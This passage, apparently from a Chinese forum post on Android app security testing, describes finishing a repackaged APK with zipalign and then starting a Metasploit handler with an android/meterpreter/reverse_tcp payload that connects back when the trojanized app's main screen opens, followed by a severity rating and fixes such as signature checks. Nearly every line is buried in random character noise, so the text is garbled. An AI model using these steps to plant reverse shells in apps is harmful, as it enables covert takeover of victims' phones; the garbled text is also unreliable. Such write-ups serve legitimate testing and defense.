1 i M2 e$ o( N& J+ l0 B 3 Q: e% W1 G8 H2 s 对齐 - Z( l5 x, t% l) b3 |4 j$ i) n' {9 @- N# z% V/ s

8 M: A# Y+ r/ d+ n. c / Z H" {* k1 i3 w' n 字节对齐优化 - l9 [$ D" h" O9 d" B. l - }7 n6 v: K# M* ^

1 i5 ?; \5 @: q2 U: y& u 3 Y% ^( W& x* e* }! ^& @0 k8 t zipalign -v 4 repackaged.apk final.apk ! O1 @5 @+ f( M9 p$ z' ^ 9 T) j: Q6 R8 o( F% h! y* M: H

' S% P" o5 R3 a9 \7 C8 [! M8 g& \- d4 P6 j: M 检查是否对齐 8 M0 {# x1 P! J + `5 M7 Q% N" \/ g7 P7 L

) Q6 q: O' r( T; [5 B+ Y1 ?( x; [& h: j$ _ zipalign -c -v 4 final.apk - F/ n' D9 E) `3 |" k v) _ ( a# f1 K. v; R- ?6 p( f( E# B. Q) K

# Y0 F$ |; X1 h6 B% `2 m 5 M; g8 A6 N2 x 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 : j- B$ M3 ~: ^+ ^9 R, `. C. c( z# G% `/ {: ~

( {& r4 T3 V- U1 s3 r : Q2 D8 | k% `9 D 启动Metasploit控制台，配置参数等待上线 - }0 @0 ~( s" w- N* r" \; r/ F: }' b* Z9 X- N* ^

& @0 Q- B$ }7 K) a 2 o# ?! I2 R# \! s 在终端依次输入如下命令 # z5 @% {: U) N/ Y0 P 4 R: ]; U1 ~" s3 W( Q

0 y, w/ d a9 C0 G" } 4 T% i& v6 \4 u/ R" C msfconsole " Q* f1 A# G: N) Q T ! q ~+ t' _+ ?( _1 N$ V* B

( m& J2 Y+ y; i1 M9 [ P7 q7 i, L9 G/ z3 h y, M use exploit/multi/handler 6 B6 p$ `( K; \: E D 9 \5 N& h8 N8 |" G+ {2 n3 @

U, B+ ?! D4 ?' K % h. h8 @" ?8 Z+ v% e set PAYLOAD android/meterpreter/reverse_tcp ' r* }. U0 ^8 T7 p 2 y+ L6 P+ z. B7 m

- Z7 E6 _( w* w" b 1 o4 v5 E) L p9 s4 Y set LHOST 192.xxx.xx.xx 6 Y+ O9 c+ W1 C [$ G& L: [ . l) H9 ^* }4 d! P! F: X

% B+ A" u1 S$ p1 e" Y 1 d* A6 g; V: s' @5 T5 M set LPORT 4444 ' Z, U7 g5 Z3 Q9 l ! d6 ~% D* j. P( U9 K: D1 e& G

/ ^7 q; s. ], l7 ?: A2 f, m( X7 B) S. @0 n+ V" H# @8 \ exploit 4 d+ F2 E; G7 i$ U , U' |) w) L. L+ E3 R2 O0 n' ^

( d( X5 h! [7 x4 u6 a6 v9 R% X) r; |+ e6 T! _4 K 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 8 r" `8 L' |, b8 T! Q% z. t- V; W2 S: c' a3 B* _- V9 N; s$ c

c% f! a. {; Z+ ?) g ! p1 y; w+ Z, T+ ^& O4 l0 |/ Q& I 漏洞危害：中 4 H" [* j& Y$ R& p( d0 e ! \% o8 [, [9 F0 ?) [. l, R

9 A+ ~" P. L4 s' ^% S( \|- q1 J$ B6 F' q9 J- M1 h4 F6 N& X6 }- Q : b! i5 S9 }- L5 b+ N- \% k7 L v0 Y4 ^5 ]5 G 严重程度 / T+ o9 g5 h o" r" i% ] e0 o. e# o6 {7 n3 c: z * [4 l+ m ]6 \|" }& J. i$ `- m- r m; V	7 B+ b2 f: V9 z @4 Z 4 M4 e' ?4 v0 X6 n 2 c; m9 x8 w4 P5 U& s: [ / A. c& u5 u* n6 T6 p 高 - N+ @+ V/ k6 S4 p# _+ n% W; H( q* M / e& E. x9 M* A ) M% x5 ?2 `& K6 T3 P : Z- q- ^- v7 V1 {7 d' b1 e	9 r9 F! F& l& s, \|5 f, A ( d- U& w o1 s6 J& Q$ [7 v ) \# z8 H. i# C c4 c+ J/ d! I5 w7 h- K; ^0 s! K9 z( U ■ 0 d9 r6 N9 t4 \. A " {4 k4 h9 T' B5 m ! K; Y2 V( g' q" ?. l X& }# V- H: b' p" I" P& V. \|" ^	1 G( j- n2 Z; E' @$ d9 a! S X ) N& Z5 p: r) A' D2 M6 w) W& ] ' P" p8 v3 L7 C7 K + z! H8 r8 F) p; Z2 [ 中 . \4 x9 R, q* P8 f 7 Q* [$ @. x; l+ n2 Q% T 4 \% v& C. j- T 7 @* J5 C& F; M8 ~2 x) q! G3 G/ Q	1 j) U/ r1 E5 X$ ? ' n! q, T; b( u+ S, v & u$ `. P- t6 @ + p- E, W. B9 d4 p/ V $ a6 M1 R0 v8 T" a: X6 W/ a% {2 C + S7 L7 N5 r) @5 x6 ?8 H/ x+ S4 }4 z% T 6 V! F$ f6 g! I( d1 g* ~" G$ o; h' I$ M/ c6 {	% h7 K5 q5 W6 H1 ^! a9 Z* v E ! ]9 K& p- R( f - g% y( _7 C7 y/ q z; \; F3 i4 Z; `' P/ B% E+ U# w: Z 低 4 e. ]6 N s% }; J ! a4 C) ~7 U' Q7 i/ B$ w! \ ' t+ Z3 p& ~/ J' ]" }7 o) ? 2 K2 U6 n( \8 N- n$ z: {	1 ^+ [3 S( J& L 5 A7 _) E& \|# E3 X 6 J2 g4 q2 m+ R4 a0 ~! U6 \|) u- b* B1 y ! v* \|7 J& ?2 n6 i7 \|7 l- n- ?: ~5 j2 P7 V7 G * E% v7 S% y; L8 e # _# r* S: o, s R 8 `0 B& b2 u& w W6 H& m5 l5 l : Y/ t' A: E, f# F% R$ ?

1 {# ^, Y7 Z5 N- a3 m2 \8 u, G* i7 L& K4 ~6 y ! Y# N7 N( O4 a* M8 H* B- A, O+ ^ $ K& Q# J u8 J' Q4 U

) B; y4 f& L( N$ l8 U p/ \) k1 B5 ? b" w 修复方法： 6 x4 w) Y- V, d e; R k( w+ _6 V j, ?; L

& _& H: H# }* T' f/ D: i4 x - Z: H. G: `' K/ g 1.在 APP 启动时应做签名校验防止二次打包。
" i! g& Z- v- D " |( \' W1 C+ q/ z$ h5 N 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 & A7 ]- T; [# N8 S) c ) X% {$ h3 R: s

8 u& S7 [1 V+ b$ c # d, s( B8 _' p 4 @ w! t7 V7 o. Y* A) V: |2 |, O; M , M, A- e' |1 X$ _9 b4 Q% p7 X. U

9 L" [9 s6 J" t) H ) ^$ Y j$ b/ q6 y
) m$ A8 b5 T, m3 y* @7 V2 O9 x6 H ' B; l# N+ _6 ^! v& f

		自动登录	找回密码
密码			立即注册